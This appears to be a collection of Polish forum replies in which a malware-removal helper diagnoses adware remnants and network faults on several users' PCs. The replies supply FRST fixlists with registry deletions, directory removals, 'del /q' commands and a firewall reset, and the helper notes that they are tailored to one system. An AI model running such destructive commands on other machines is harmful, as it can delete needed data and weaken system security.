C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Auto C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Testserver C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TNod User & Password Finder C:\Users\Admin\AppData\Local\CRE C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data C:\Users\Admin\AppData\Roaming\svchost.exe C:\Users\Admin\AppData\Roaming\Windows C:\Windows\System32\drivers\{58aaf827-6246-4d80-8213-f02005f6345c}w64.sys C:\Windows\System32\drivers\{b9a19c25-a741-47e5-91a2-0b62bef307ff}w64.sys C:\Windows\System32\drivers\wStLibG64.sys Reg: reg delete HKCU\Software\Google\Chrome\Extensions /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\DAEMON Tools Lite" /f Reg: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains" /f CMD: netsh advfirewall reset Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj Vuze Remote Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 4. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z zaznaczonym polem Addition. Dołącz też plik fixlog.txt. Wypowiedz się czy jest poprawa.

Trochę się pośpieszyłeś z tą reinstalacją Google Chrome, gdyż miałam w zamiarze podać szczegółowe kroki jak to zrobić (krok pierwszy przed deinstalacją to wyłączenie synchronizacji z serwerem, o ile włączona). Przy okazji także miały być wdrażane mniejsze korekty. Poczekam na zawartość folderu, by zaadresować merytorycznie całość zagadnienia, i podam jeszcze kroki dodatkowe.

Temat przenoszę do działu Sieci. W raportach nie ma żadnych oznak infekcji mogącej powodować opisywany efekt. Są tylko szczątki adware, które jednak nie są powiązane z usterką. Doczyszczanie w spoilerze. I wg raportu FRST logi były robione przy braku połączenia, jest też jakieś urządzenie Ethernet raportowane jako niedziałające ze względu na brak sterowników: DNS Servers: Urządzenie nie jest podłączone do internetu. ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: Kontroler Ethernet Description: Kontroler Ethernet Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. Sugestie: 1. Ślady adware, nie wiadomo co dokładnie było wcześniej, na wszelki wypadek zresetuj cały Winsock (część Protocol i NameSpace): KLIK. 2. Przeinstaluj urządzenia sieciowe oraz uzupełnij w/w brakujące sterowniki. 3. W przypadku braku rezultatów podaj dane wymagane działem Sieci: KLIK.

1. Tak, Fix zdołał zrobić tylko część zadania. Podejście poprawkowe. Otwórz Notatnik i wklej w nim: DeleteKey: HKLM\SOFTWARE\Classes\qpakfile DeleteKey: HKLM\SOFTWARE\_CrossriderRegNamePlaceHolder_ DeleteKey: HKLM\SOFTWARE\downchecker DeleteKey: HKLM\SOFTWARE\Crossrider DeleteKey: HKLM\SOFTWARE\FFPluginHp DeleteKey: HKLM\SOFTWARE\GlobalUpdate DeleteKey: HKLM\SOFTWARE\GoHD DeleteKey: HKLM\SOFTWARE\InstalledBrowserExtensions DeleteKey: HKLM\SOFTWARE\ihpmserver DeleteKey: HKLM\SOFTWARE\RayDld DeleteKey: HKLM\SOFTWARE\Reg\Clean DeleteKey: HKLM\SOFTWARE\SavePass 1.1 DeleteKey: HKLM\SOFTWARE\sweet-pageSoftware DeleteKey: HKLM\SOFTWARE\Tencent DeleteKey: HKLM\SOFTWARE\Tutorials DeleteKey: HKLM\SOFTWARE\Yahoo\Companion DeleteKey: HKLM\SOFTWARE\WdsManPro DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\SavePass 1.1 DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\GoHD DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GLOBALUPDATE.EXE DeleteKey: HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_QMIEPROTECT DeleteKey: HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_QQPCRTP DeleteKey: HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TAOACCELERATOR DeleteKey: HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TSFLTMGR DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\WdsManPro DeleteKey: HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_QMUDISK DeleteKey: HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_QQPCRTP DeleteKey: HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_TAOACCELERATOR DeleteKey: HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_TSFLTMGR DeleteKey: HKLM\SYSTEM\ControlSet003\Enum\Root\LEGACY_QMUDISK DeleteKey: HKLM\SYSTEM\ControlSet003\Enum\Root\LEGACY_QQPCRTP DeleteKey: HKLM\SYSTEM\ControlSet003\Enum\Root\LEGACY_TAOACCELERATOR DeleteKey: HKLM\SYSTEM\ControlSet003\Enum\Root\LEGACY_TSFLTMGR DeleteKey: HKLM\SYSTEM\WifiSafeCfg DeleteKey: HKU\S-1-5-18\Software\Tencent DeleteKey: HKU\S-1-5-18\Software\Yahoo\Companion RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\Documents and Settings\All Users\Documents\ShopperPro RemoveDirectory: C:\Documents and Settings\Administrator\Application Data\Mozilla RemoveDirectory: C:\Documents and Settings\Gość\Application Data\Mozilla RemoveDirectory: C:\Documents and Settings\Krzysztof\Application Data\Mozilla\Firefox\Profiles\12h1ceb6.default-1404211074967 RemoveDirectory: C:\FRST\Quarantine CMD: del /q "C:\Documents and Settings\Krzysztof\Desktop\Mozilla Firefox.lnk" CMD: del /q C:\WINDOWS\system32\roboot.exe EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. Powstanie kolejny fixlog.txt. Przedstaw go. 2. Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście odpadkowy wpis Facebook Update Helper > Dalej.

W raportach brak oznak oczywistej infekcji w Chrome, poza sponsorowaną wyszukiwarką Google (z sufiksem trackid=sp-004752), co z pewnością nie jest przyczyną problemów. To oznacza, że prawdopodobnie jest zmodyfikowany globalny plik zasobów resources.pak i będzie konieczna reinstalacja przeglądarki. Należy potwierdzić obecność tej modyfikacji. Poproszę o przesłanie katalogu Google Chrome do ręcznej analizy. Skopiuj na Pulpit folder: C:\Program Files (x86)\Google\Chrome Spakuj do ZIP, shostuj gdzieś i prześlij mi link do paczki na PW. PS. Uwaga na przyszłość: ComboFix słabo się nadaje do czyszczenia adware. Najbardziej specjalizowane programy to AdwCleaner i MBAM.

Czy po deinstalacji Pandy nastąpiła jakaś poprawa? Skan SFC nie wykrył żadnych błędów. Zastosuj narzędzie Fix-it z artykułu KB945011. Nie sugeruj się formułą artykułu, procedura usuwania wartości z klucza TrayNotify służy naprawianiu wielu usterek tej strefy. Dziennik zdarzeń wskazuje, że jeden ze sterowników nie jest ładowany. Uruchom Autoruns, w karcie Drivers odznacz pozycję VBoxDrv. To wyłączenie komponentu jest równoznaczne z cofnięciem wersji Internet Explorer do starszej wersji. I skoro obecnie komponent jest zdeaktywowany, to nie będzie aktualizacji dla niego pokazywanych.

Fix wykonany pomyślnie. Zastosuj DelFix i wyczyść foldery Przywracania systemu: KLIK.

Na przyszłość: nie uruchamiaj FRST Fix dwa razy, niezależnie od tego czy był błąd. Podwójne uruchomienie popsuło szyki, nie ma raportu, więc nie wiadomo ile zostało usunięte. No cóż, poproszę ponownie o to:

Temat przenoszę do działu Windows, pod zmienionym bardziej dopasowanym do problemu tytułem. Brak oznak czynnej infekcji. Nie, nie ma "trojana COM Surrogate". Samo hasło "COM Surrogate" jest zaś nazwą systemowego procesu dllhost.exe: Użytkownicy "połączyli" tę nazwę z infekcją ze względu na efekty jakie infekcja produkowała (rozmnożenie instancji procesu dllhost.exe). U Ciebie na pewno nie ma tej infekcji. Skąd tu w ogóle pomysł, że taka infekcja miałaby być? Skoro wspominasz nazwę "COM Surrogate", to czy to oznacza, że widzisz jakiś błąd z dllhost.exe? Z raportów nic nie wynika, a objawy może produkować mnóstwo czynników (od software aż po hardware). Rozwiń o co chodzi z "czasem nawet się nie włącza", opisz jak to dokładnie wygląda, na jakim ekranie zatrzymuje się uruchamianie. W zależności od tego jak ten defekt wygląda może się okazać, że problem jest np. sprzętowy. Na razie nie za wiele jestem w stanie zrobić. Sugestie: 1. Odinstaluj zbędne zintegrowane programy ASUS AsusVibe2.0, WebStorage, co zredukuje ilość uruchamianych procesów. WebStorage zresztą znany z generowana błędów w eksploratorze Windows. 2. Wyłącz crack Office i aktualizatory ASUS w Harmonogramie zadań. Uruchom Autoruns i w karcie Scheduled Tasks odznacz te pozycje: Task: {4167E53F-2364-436F-B7E5-E68052344202} - System32\Tasks\IORRT => C:\IORRT\IORRT.bat [2014-11-11] () Task: {43AD02B5-464D-4394-A4F4-5F28253F431A} - System32\Tasks\Hybrid => C:\IORRT\IORRT.bat [2014-11-11] () Task: {CD950988-52E6-44EF-9B53-2914411E6768} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [2015-07-13] () Task: {E7E663E0-6CE0-40DA-8DB1-2C91B5BC1369} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [2015-07-13] () Po tym zresetuj system. PS. W spoilerze doczyszczanie mikro szczątków adware i wpisów pustych. To nie ma związku ze zgłaszanymi problemami i nie wpłynie na poprawę stanu systemu.

Fix FRST jest jednorazowego użytku i nie wolno go powtarzać, nie przetworzy ponownie po raz drugi tego samego. Zadany został uruchomiony dwa razy i to co tu widzę to już drugie bezużyteczne podejście, log na dodatek urwany zaraz na początku. Poproszę o log z poprzedniego podejścia. Wejdź do katalogu C:\FRST\Logs, ułóż logi wg nazwy, wyszukaj pliki o modelu nazwy Fixlog_data_czas. Otwórz w Notatniku pliki i szukaj tego który ma w nagłówku: Ran by Krzysztof (2015-10-30 19:44:44) Run:3 Ten plik jest tym o który mi chodzi.

W raportach nie widać żadnych jawnych oznak infekcji, z wyjątkiem tego że w GMER jest jakiś "podejrzany moduł" załadowany do explorer.exe, tylko nawet nie widać w jakiej ścieżce (bug z obcięciem ścieżki). Z tym że ten odczyt nie musi być związany z żadną infekcją. Są tu zainstalowane trzy przeglądarki wtórne: Google Chrome, Firefox, Opera. Domyślną jest Firefox. W której przeglądarce występują przekierowania, a może we wszystkich?